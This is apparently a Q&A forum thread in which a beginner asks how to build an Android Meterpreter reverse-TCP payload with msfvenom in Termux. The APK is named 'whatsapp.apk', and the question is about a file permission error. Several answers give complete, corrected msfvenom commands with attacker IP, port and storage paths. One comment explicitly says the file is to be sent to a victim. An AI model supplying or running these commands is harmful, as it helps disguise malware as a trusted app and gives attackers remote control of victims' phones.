# Creating metasploit payload in termux

Tags: termux

I am trying to create metasploit payload using termux on my android phone. I am a beginner. I am giving the following command

```
msf > ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 R> /storage/whatsapp.apk
```

(I am writing STORAGE as destinaion to save the APK file, as I dont have a sdcard. I have checked the setting in termux, where storage permission has been allowed.)

I am getting the following error:

> [*] exec: ruby msfvenom -p android/meterpreter/reverse_tcp
>   LHOST=56.37.60.149 LPORT=4444 R> /storage/whatsapp.apk
>
> sh: 1: cannot create /storage/whatsapp.apk: Permission denied

Answer (score 1):

This error is Caused by not having Superuser (Root) Permissions...instead of storage/WhatsApp.apk...

You have to understand Linux Filesystems to learn about permissions...you can use these commands to do what you wish to do...

First...to give termux access to Your Internal Storage...you'll have to use `termux-setup-storage` and Allow Access to Files on Android 7+

Next...
Run this Modified Command..

`msf > ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 R> /sdcard/whatsapp.apk`

Answer (score 0):

If you have already installed metasploit framework on your termux, you can use this command:

```
cd #HOME
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT> -a dalvik --platform android R > storage/downloads/name.apk
```

Answer (score 0):

try

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > ~/storage/shared/Unkn0wn.apk
```

Or

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > /storage/emulated/0/Unkn0wn.apk
```

Or

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=56.37.60.149 LPORT=4444 -a dalvik --platform android R > /sdcard/Unkn0wn.apk
```

Answer (score 0):

It's because you don't need ruby. Try this:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 (Name file whatever you want).apk
```

Comment: P.S. This adds the file to your storage so that you can send it to your victim

Comment: I apologize I messed up on my own code here's the correction:

Comment: msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > (name file whatever you want).apk